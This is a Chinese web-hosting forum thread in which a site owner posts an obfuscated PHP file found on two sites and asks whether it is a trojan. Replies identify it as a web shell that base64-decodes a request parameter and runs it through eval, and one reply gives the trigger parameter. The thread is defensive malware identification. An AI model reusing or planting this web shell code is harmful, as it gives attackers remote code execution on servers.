全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 775|回复: 7

[疑问] 这个php文件是不是木马?

[复制链接]
发表于 2022-12-7 16:12:22 | 显示全部楼层 |阅读模式
还请懂个老哥解惑下,两个站都有类似的文件;

<?php
class tb3abe      
{
  public $base64;
  function __construct()
  {
    $this->/*b1688a027dd4d8f1d*/base64/*d505aa2a7eff*/=$_REQUEST['white'];
  }
  function __toString()
  {
    return /*a8cc97610c62df*/base64_decode/*99013d759*/($this->base64);
  }

}
class f4d59f554e217
{
  protected $e=null;
  function __construct()
  {
    $this->e = new tb3abe();

  }
  function __destruct()
  {

    /*8c0a6173cd9e3866c85b0bc1e8*/@eval/*0929963467231de36ce*/($this->e);
  }

}
$one = new f4d59f554e217();
?>
发表于 2022-12-7 16:14:06 | 显示全部楼层
必然是木马了,先base64解码,再调用eval函数
发表于 2022-12-7 16:16:36 | 显示全部楼层
juniko 发表于 2022-12-7 16:14
必然是木马了,先base64解码,再调用eval函数

是不是调了eval函数的大部分都是木马,  正常程序一般都不允许用这个函数吧,太危险了
 楼主| 发表于 2022-12-7 16:18:53 | 显示全部楼层
juniko 发表于 2022-12-7 16:14
必然是木马了,先base64解码,再调用eval函数

多谢老哥,我先删了?能详细说下吗。我看不懂
发表于 2022-12-7 16:19:04 | 显示全部楼层
Alook 发表于 2022-12-7 16:16
是不是调了eval函数的大部分都是木马,  正常程序一般都不允许用这个函数吧,太危险了 ...

正常也有用这个函数的,特别是一些缓存之类的。说危险这个函数估计能排前几了
发表于 2022-12-7 17:04:30 | 显示全部楼层
有eval这个函数99%是了
发表于 2022-12-7 17:05:33 | 显示全部楼层
有一个文件的说明系统有漏洞了,你就算删了他下次可以还是可以入侵进来,下次估计手段就更隐蔽了
发表于 2022-12-7 21:19:37 | 显示全部楼层
本帖最后由 hins 于 2022-12-7 21:31 编辑

是木马,有eval函数  执行方法 ?white=base64机密过的php代码


您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-4-28 12:26 , Processed in 0.065107 second(s), 9 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表